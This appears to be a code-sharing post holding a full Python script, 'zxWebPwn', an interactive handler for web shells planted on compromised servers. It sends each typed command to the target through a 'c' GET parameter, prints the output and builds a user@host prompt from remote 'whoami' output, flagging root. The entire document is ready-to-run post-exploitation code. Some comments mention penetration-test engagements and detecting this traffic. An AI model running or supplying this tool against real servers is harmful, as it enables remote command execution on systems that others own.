Created
January 23, 2021 17:52
A very simple pseudo shell in Python to interact with web shells more effectively.
#!/usr/bin/env python3 | |
################################################## | |
# Copyright (c) 2020 Zhao Xiang Lim. | |
# All Rights Reserved. | |
# Released under the MIT License. | |
# | |
# [ developer@zxlim.xyz ] | |
################################################## | |
from argparse import ArgumentParser | |
from urllib.parse import urlparse | |
import cmd | |
import requests | |
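def execute_command(url, cmd, timeout=30):
    """Send one command to the endpoint at *url* and report the outcome.

    The command is passed as the ``c`` query parameter of an HTTP GET
    request. Each command is therefore part of the request URL and is
    recorded verbatim wherever URLs are logged (web-server access logs,
    proxies), which is worth remembering when scoping and reporting an
    engagement and when hunting for this traffic.

    Args:
        url: Full URL of the endpoint, as a string.
        cmd: Command text to send. This parameter name shadows the
            module-level ``cmd`` import inside this function.
        timeout: Seconds to wait for the connection and for data before
            giving up.

    Returns:
        A ``(success, text)`` tuple. ``success`` is True only for an HTTP
        200 response, in which case ``text`` is the response body.
        Otherwise ``text`` is a human-readable error message.
    """
    try:
        # requests has no default timeout; without one a stalled server
        # blocks the interactive loop indefinitely.
        response = requests.get(url, params={"c": cmd}, timeout=timeout)
    except requests.exceptions.ConnectionError:
        return False, f"[!] Failed to connect to target URL: {url}"
    except requests.exceptions.RequestException as exc:
        # Read timeouts, malformed URLs, redirect loops, etc. previously
        # escaped as an uncaught traceback.
        return False, f"[!] Request failed: {exc}"

    if response.status_code == 200:
        return True, response.text
    return False, f"[!] HTTP Error Code: {response.status_code}\n\n{response.text}"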
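def get_shell_prompt(url):
    """Build the interactive prompt from the remote ``whoami`` output.

    Args:
        url: Parsed URL object (it must provide ``geturl()`` and
            ``hostname``, as the result of ``urlparse`` does).

    Returns:
        The prompt string ``"[zxWebPwn] <user>@<host> <suffix> "``, where
        the suffix is ``#`` for ``root`` and ``$`` otherwise, or ``False``
        when the request did not succeed.
    """
    cmd_success, response = execute_command(url.geturl(), "whoami")
    if not cmd_success:
        return False

    # The response body is controlled by the remote host and is re-printed
    # as part of the prompt on every input line. Drop non-printable
    # characters so control sequences in it cannot reach the local terminal.
    username = "".join(ch for ch in str(response).strip() if ch.isprintable())
    suffix = "#" if username.lower() == "root" else "$"
    return f"[zxWebPwn] {username}@{url.hostname} {suffix} "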
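class zxWebPwnHandler(cmd.Cmd):
    """Line-oriented front end that forwards each input line to the endpoint.

    Every line that is not handled locally is sent with ``execute_command``
    and the response body is printed. ``exit``, ``quit`` and EOF end the loop.
    """

    def __init__(self, url, prompt="[zxWebPwn] $ "):
        """Store the parsed target URL and the prompt text to display."""
        super().__init__()
        self.url = url
        self.prompt = str(prompt)

    def do_help(self, line):
        """Replace the built-in help listing with a fixed message."""
        print("[zxWebPwn] You need no help. Just treat this as a 'normal' shell...")

    def emptyline(self):
        """Do nothing on an empty line.

        The ``cmd.Cmd`` default repeats the last command, which here would
        re-send it to the remote host on an accidental Enter.
        """

    def default(self, line):
        """Handle any line that has no dedicated ``do_*`` method."""
        if line in ("zxpwn-reload-user", "zxpwn-update-user"):
            refreshed = get_shell_prompt(self.url)
            if refreshed is False:
                # get_shell_prompt returns False on failure; assigning that
                # to self.prompt would make the prompt read "False".
                print("[!] Could not refresh the prompt; keeping the current one.")
            else:
                self.prompt = refreshed
        elif line.startswith("cd"):
            # You can't really 'cd' since every command is executed in a new
            # shell instance by the web shell.
            print("[-] NOTE: This is not a normal shell! The command 'cd' will not work as expected.")
        else:
            _, response = execute_command(self.url.geturl(), line)
            # NOTE(review): the body is printed exactly as the remote host
            # returned it, so any control sequences in it reach the local
            # terminal unfiltered.
            print(response)

    def do_EOF(self, line):
        """End the loop on EOF, printing a newline first."""
        print()
        return True

    def do_exit(self, line):
        """End the loop."""
        return True

    def do_quit(self, line):
        """End the loop."""
        return True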
def _parse_cmd_args():
    """Parse the command line and return the namespace holding ``URL``."""
    arg_parser = ArgumentParser(
        description="[zxWebPwn] A Web Shell Handler that improves your sanity. Sort of I guess.",
    )
    # Single required positional argument: the endpoint to talk to.
    arg_parser.add_argument(
        "URL",
        type=str,
        help="Full URL of web shell instance to interact with. Make sure it takes in commands via the 'c' GET parameter.",
    )
    parsed = arg_parser.parse_args()
    return parsed
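def main():
    """Parse the target URL, probe it once, then start the interactive loop.

    The URL is validated before any request is made. A URL without an
    http/https scheme or host, or with a malformed port, is rejected with a
    message instead of failing later inside the HTTP client.
    """
    args = _parse_cmd_args()
    url = urlparse(args.URL)

    try:
        # Accessing .port raises ValueError for a non-numeric or
        # out-of-range port.
        explicit_port = url.port
    except ValueError:
        explicit_port = None
        port_ok = False
    else:
        port_ok = True

    if not port_ok or url.scheme not in ("http", "https") or not url.hostname:
        print(f"[!] Invalid URL (expected http:// or https://): {args.URL}")
        return

    shell_prompt = get_shell_prompt(url)
    if shell_prompt is False:
        print(f"[!] Failed to connect to target URL: {url.geturl()}")
        return

    # url.port is None when the URL carries no explicit port; report the
    # scheme's default instead of printing "None/tcp".
    port = explicit_port or (443 if url.scheme == "https" else 80)
    print(f"[+] Connected to target at {url.hostname} ({port}/tcp)\n")
    handler = zxWebPwnHandler(url, shell_prompt)
    handler.cmdloop()


# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()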